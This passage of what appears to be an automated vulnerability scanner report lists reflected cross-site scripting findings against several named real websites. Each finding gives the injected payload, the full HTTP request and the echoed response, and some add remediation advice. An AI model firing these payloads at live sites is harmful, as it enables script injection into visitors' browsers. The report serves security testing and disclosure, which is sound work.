Summary

Severity:   High
Confidence:   Certain
Host:   http://player.stv.tv
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7eb3c<img%20src%3da%20onerror%3dalert(1)>701dbe90b3c was submitted in the REST URL parameter 1. This input was echoed as 7eb3c<img src=a onerror=alert(1)>701dbe90b3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico7eb3c<img%20src%3da%20onerror%3dalert(1)>701dbe90b3c HTTP/1.1
Host: player.stv.tv
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2276b588%2D65fd%2D480a%2Dbd7a%2D45e2d0af8043; CFTOKEN=0; __utmz=187638121.1303604918.1.1.utmcsr=reddit.com|utmccn=(referral)|utmcmd=referral|utmcct=/search; __utma=187638121.766996194.1303604918.1303604918.1303604918.1; __utmc=187638121; __utmb=187638121.1.10.1303604918; __utmz=1.1303604918.1.1.utmcsr=reddit.com|utmccn=(referral)|utmcmd=referral|utmcct=/search; __utma=1.1014340304.1303604918.1303604918.1303604918.1; __utmc=1; __utmb=187638121.2.10.1303604918

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 12310
Content-Type: text/html;charset=UTF-8
X-Host: player.stv.tv
Content-Length: 12310
Date: Sun, 24 Apr 2011 00:43:10 GMT
X-Varnish: 347349973
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: Varnish-2
X-Cache: MISS


<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
}
.fw_titles{
font-size: 13px;
font-wei
...[SNIP]...
</strong>
The event handler: favicon.ico7eb3c<img src=a onerror=alert(1)>701dbe90b3c.index is not valid registered event.<br />
...[SNIP]...

2.37. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.stv.tv
Path:   /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a666c<img%20src%3da%20onerror%3dalert(1)>37a13038884 was submitted in the REST URL parameter 1. This input was echoed as a666c<img src=a onerror=alert(1)>37a13038884 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searcha666c<img%20src%3da%20onerror%3dalert(1)>37a13038884/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ HTTP/1.1
Host: player.stv.tv
Proxy-Connection: keep-alive
Referer: http://www.reddit.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=92f1ce77%2D59ab%2D4f4d%2Dae44%2D8020a04638da; Expires=Mon, 22-Apr-2041 08:34:18 GMT; Path=/
Set-Cookie: CFTOKEN=0; Expires=Mon, 22-Apr-2041 08:34:18 GMT; Path=/
Content-Length: 12466
Content-Type: text/html;charset=UTF-8
X-Host: player.stv.tv
Content-Length: 12466
Date: Sun, 24 Apr 2011 00:42:48 GMT
X-Varnish: 347349436
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: Varnish-2
X-Cache: MISS


<style>
/* DEBUG PANEL MAIN */
.fw_debugPanel{
font-family: Arial,Helvetica,sans-serif;
font-size: 11px;
font-weight: normal;
color: #000000;
text-align: left;
}
.fw_titles{
font-size: 13px;
font-wei
...[SNIP]...
</strong>
The event handler: searcha666c<img src=a onerror=alert(1)>37a13038884.">
...[SNIP]...

2.38. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.stv.tv
Path:   /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca4c4"><img%20src%3da%20onerror%3dalert(1)>f4d47744512 was submitted in the REST URL parameter 2. This input was echoed as ca4c4"><img src=a onerror=alert(1)>f4d47744512 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/ca4c4"><img%20src%3da%20onerror%3dalert(1)>f4d47744512/ HTTP/1.1
Host: player.stv.tv
Proxy-Connection: keep-alive
Referer: http://www.reddit.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=6385027f%2De702%2D4bdd%2Da192%2D75788c128482; Expires=Mon, 22-Apr-2041 08:35:11 GMT; Path=/
Set-Cookie: CFTOKEN=0; Expires=Mon, 22-Apr-2041 08:35:11 GMT; Path=/
Content-Length: 29703
Content-Type: text/html;charset=UTF-8
X-Host: player.stv.tv
Content-Length: 29703
Date: Sun, 24 Apr 2011 00:43:42 GMT
X-Varnish: 347350770
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: Varnish-2
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>
<meta http-equiv
...[SNIP]...
<link href="/search/ca4c4"><img src=a onerror=alert(1)>f4d47744512/?rss" rel="alternate" type="application/rss+xml" title="STV Player - search results for ca4c4">
...[SNIP]...

2.39. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://player.stv.tv
Path:   /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e695f(a)c8488e7fd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSSe695f(a)c8488e7fd4/ HTTP/1.1
Host: player.stv.tv
Proxy-Connection: keep-alive
Referer: http://www.reddit.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=bc94f29c%2D1b64%2D4472%2D98d2%2D9db29d56aa64; Expires=Mon, 22-Apr-2041 08:35:18 GMT; Path=/
Set-Cookie: CFTOKEN=0; Expires=Mon, 22-Apr-2041 08:35:18 GMT; Path=/
Content-Length: 29599
Content-Type: text/html;charset=UTF-8
X-Host: player.stv.tv
Content-Length: 29599
Date: Sun, 24 Apr 2011 00:43:49 GMT
X-Varnish: 347350883
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: Varnish-2
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>
<meta http-equiv
...[SNIP]...
<h1>xsse695f(a)c8488e7fd4.page&amp;stv_server_id=Web1");
// ]]>
...[SNIP]...

2.40. http://player.stv.tv/search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://player.stv.tv
Path:   /search/%22%3E%3Cmarquee%3E%3Ch1%3EXSS/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6c29"%3bc10987591b3 was submitted in the REST URL parameter 2. This input was echoed as a6c29";c10987591b3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search/a6c29"%3bc10987591b3/ HTTP/1.1
Host: player.stv.tv
Proxy-Connection: keep-alive
Referer: http://www.reddit.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: CFID=ef5bffa7%2D473c%2D4b23%2D9bba%2D9f42435f52ae; Expires=Mon, 22-Apr-2041 08:35:13 GMT; Path=/
Set-Cookie: CFTOKEN=0; Expires=Mon, 22-Apr-2041 08:35:13 GMT; Path=/
Content-Length: 29407
Content-Type: text/html;charset=UTF-8
X-Host: player.stv.tv
Content-Length: 29407
Date: Sun, 24 Apr 2011 00:43:44 GMT
X-Varnish: 347350818
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: Varnish-2
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head>
<meta http-equiv
...[SNIP]...
<'+'/p>');};
sitestat("//uk.sitestat.com/stv/player/s?name=search.a6c29";c10987591b3.page&amp;stv_server_id=Web2");
// ]]>
...[SNIP]...

2.41. http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The value of the slotname request parameter is copied into the HTML document as plain text between tags. The payload 6899e<script>alert(1)</script>d4169fc9e6f was submitted in the slotname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gampad/ads?correlator=1303613695102&output=json_html&callback=GA_googleSetAdContentsBySlotForSync&impl=s&client=ca-pub-0640823897479847&slotname=86x40_Target_Nav_Ad6899e<script>alert(1)</script>d4169fc9e6f&page_slots=86x40_Target_Nav_Ad&cookie_enabled=1&url=http%3A%2F%2Fwww.startribune.com%2Fbusiness%2F120319724.html&lmt=1303631685&dt=1303613696772&cc=17&biw=956&bih=926&ifi=1&adk=2010173350&u_tz=-300&u_his=1&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&flash=10.2.154&gads=v2&ga_vid=669632137.1303613697&ga_sid=1303613697&ga_hid=1201002597 HTTP/1.1
Host: pubads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __utmz=251550727.1303423668.1.1.utmcsr=mgid.com|utmccn=(referral)|utmcmd=referral|utmcct=/ban/home_300_top.html; __utma=251550727.399576100.1303423668.1303423668.1303423668.1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:13:24 GMT
Server: gfp-be
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 2732

GA_googleSetAdContentsBySlotForSync({"86x40_Target_Nav_Ad6899e<script>alert(1)</script>d4169fc9e6f":{"_type_":"html","_expandable_":false,"_html_":"\x3c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\"\x3e\x3chtml\x3e\x3chead\x3e\x3cstyle\x3ea:link{color:#f
...[SNIP]...

2.42. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tap-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/page_parser.js

Issue detail

The value of the d request parameter is copied into a JavaScript inline comment. The payload 6c877*/alert(1)//a9785d1590b was submitted in the d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /partner/scripts/rubicon/page_parser.js?d=www.startribune.com6c877*/alert(1)//a9785d1590b HTTP/1.1
Host: tap-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_1185=2931142961646634775; put_2132=978972DFA063000D2C0E7A380BFA1DEC; put_2100=usr3fd49cb9a7122f52; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1197=3419824627245671268; khaos=GMMM8SST-B-HSA1; lm="21 Apr 2011 23:56:48 GMT"; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ruid=154dab7990adc1d6f3372c12^3^1303613691^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses5=12142^1; ses15=9346^1; csi15=3188371.js^1^1303615864^1303615864; csi2=3153070.js^1^1303613706^1303613706; rdk=7556/12142; rdk2=0; ses2=12801^1&12142^1; cd=false; rpb=5328%3D1%265671%3D1%264212%3D1%266286%3D1%266073%3D1%264210%3D1%265852%3D1%264554%3D1%264214%3D1%262372%3D1%263811%3D1%262374%3D1%264222%3D1%264894%3D1; put_1986=2724386019227846218

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
Last-Modified: Sun, 24 Apr 2011 03:14:33 GMT
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/javascript;charset=UTF-8
Cache-Control: private, max-age=3600
Expires: Sun, 24 Apr 2011 04:14:33 GMT
Date: Sun, 24 Apr 2011 03:14:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 17455


/*! Copyright 2009,2010 the Rubicon Project. All Rights Reserved. No permission is granted to use, copy or extend this code */


/*
   The requested resource (/oz/scripts/domains/startribune.com6c877*/alert(1)//a9785d1590b/page_parser_hooks.js) is not available
*/


function oz_trim(A){return A.replace(/^\s+|\s+$/g,"");}function PageParser(){this.timeout=2000;this.doc=document;this.stopwords=null;this.init=function(
...[SNIP]...

2.43. http://widgets.digg.com/buttons/count [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload f0c49<script>alert(1)</script>5947e1fafc3 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///C%3A/cdn/2011/04/23/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-admin.testandtarget.omniture.com_443.htmf0c49<script>alert(1)</script>5947e1fafc3 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 24 Apr 2011 00:41:02 GMT
Via: NS-CACHE: 100
Etag: "0d2f516f7fa0302f403bf2f0c3628970194e661c"
Content-Length: 207
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sun, 24 Apr 2011 00:51:01 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/cdn/2011/04/23/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-admin.testandtarget.omniture.com_443.htmf0c49<script>alert(1)</script>5947e1fafc3", "diggs": 0});

2.44. http://ww2.startribune.com/dynamic/homes/tophomes_module.php [dart parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ww2.startribune.com
Path:   /dynamic/homes/tophomes_module.php

Issue detail

The value of the dart request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e18'%3balert(1)//ca877ea91 was submitted in the dart parameter. This input was echoed as a7e18';alert(1)//ca877ea91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dynamic/homes/tophomes_module.php?do=6&dart=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBhqAYB5GzTZi3HtGHlAeZ5ZXECpH8g_EBAAAAEAEg4YW0CTgAWIGU--4PYMkGsgETd3d3LnN0YXJ0cmlidW5lLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vd3d3LnN0YXJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB%26num%3D0%26sig%3DAGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q%26client%3Dca-pub-0640823897479847%26adurl%3Da7e18'%3balert(1)//ca877ea91 HTTP/1.1
Host: ww2.startribune.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Sun, 24 Apr 2011 03:12:04 GMT
Connection: close
Content-Length: 9160

document.write('<div style="width:300px;background-color:white"><!-- start top homes code --><img src="http://stmedia.startribune.com/designimages/tophomes0809.jpg" alt="Is this your next home
...[SNIP]...
J0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB&num=0&sig=AGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q&client=ca-pub-0640823897479847&adurl=a7e18';alert(1)//ca877ea91http://homes.startribune.com/for-sale/listing/20-13003519">
...[SNIP]...

2.45. http://ww2.startribune.com/dynamic/homes/tophomes_module.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ww2.startribune.com
Path:   /dynamic/homes/tophomes_module.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cff00'%3balert(1)//5d2a8a1ca84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff00';alert(1)//5d2a8a1ca84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /dynamic/homes/tophomes_module.php?do=6&dart=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBhqAYB5GzTZi3HtGHlAeZ5ZXECpH8g_EBAAAAEAEg4YW0CTgAWIGU--4PYMkGsgETd3d3LnN0YXJ0cmlidW5lLmNvbboBCjMwMHgyNTBfYXPIAQnaATJodHRwOi8vd3d3LnN0YXJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB%26num%3D0%26sig%3DAGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q%26client%3Dca-pub-0640823897479847%26adur/cff00'%3balert(1)//5d2a8a1ca84l%3D HTTP/1.1
Host: ww2.startribune.com
Proxy-Connection: keep-alive
Referer: http://www.startribune.com/business/120319724.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: private, max-age=60
Date: Sun, 24 Apr 2011 03:12:05 GMT
Connection: close
Content-Length: 9280

document.write('<div style="width:300px;background-color:white"><!-- start top homes code --><img src="http://stmedia.startribune.com/designimages/tophomes0809.jpg" alt="Is this your next home
...[SNIP]...
XJ0cmlidW5lLmNvbS9idXNpbmVzcy8xMjAzMTk3MjQuaHRtbOABA8ACAuACAOoCElRvcF9TdGFja3NfMzAweDI5OfgC8NEekAOkA5gDpAOoAwHQBJBO4AQB&num=0&sig=AGiWqty0U21kPzJUR_so1JDAuqz2yhPd8Q&client=ca-pub-0640823897479847&adur/cff00';alert(1)//5d2a8a1ca84l=http://homes.startribune.com/for-sale/listing/1814-3985775">
...[SNIP]...

2.46. http://www.discoverbing.com/Activities/BeEntertained [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /Activities/BeEntertained

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5945"><script>alert(1)</script>96d473a90ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Activities/BeEntertained?e5945"><script>alert(1)</script>96d473a90ab=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569652387; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:41:00 GMT
Content-Length: 22449


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BeEntertained?e5945"><script>alert(1)</script>96d473a90ab=1&fbshare=true&t=Look+what+I+discovered+about+staying+entertained+with+Bing+on+DiscoverBing"
target="_blank">
...[SNIP]...

2.47. http://www.discoverbing.com/Activities/BeHealthy [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /Activities/BeHealthy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d26e8"><script>alert(1)</script>f6b006dd9db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Activities/BeHealthy?d26e8"><script>alert(1)</script>f6b006dd9db=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
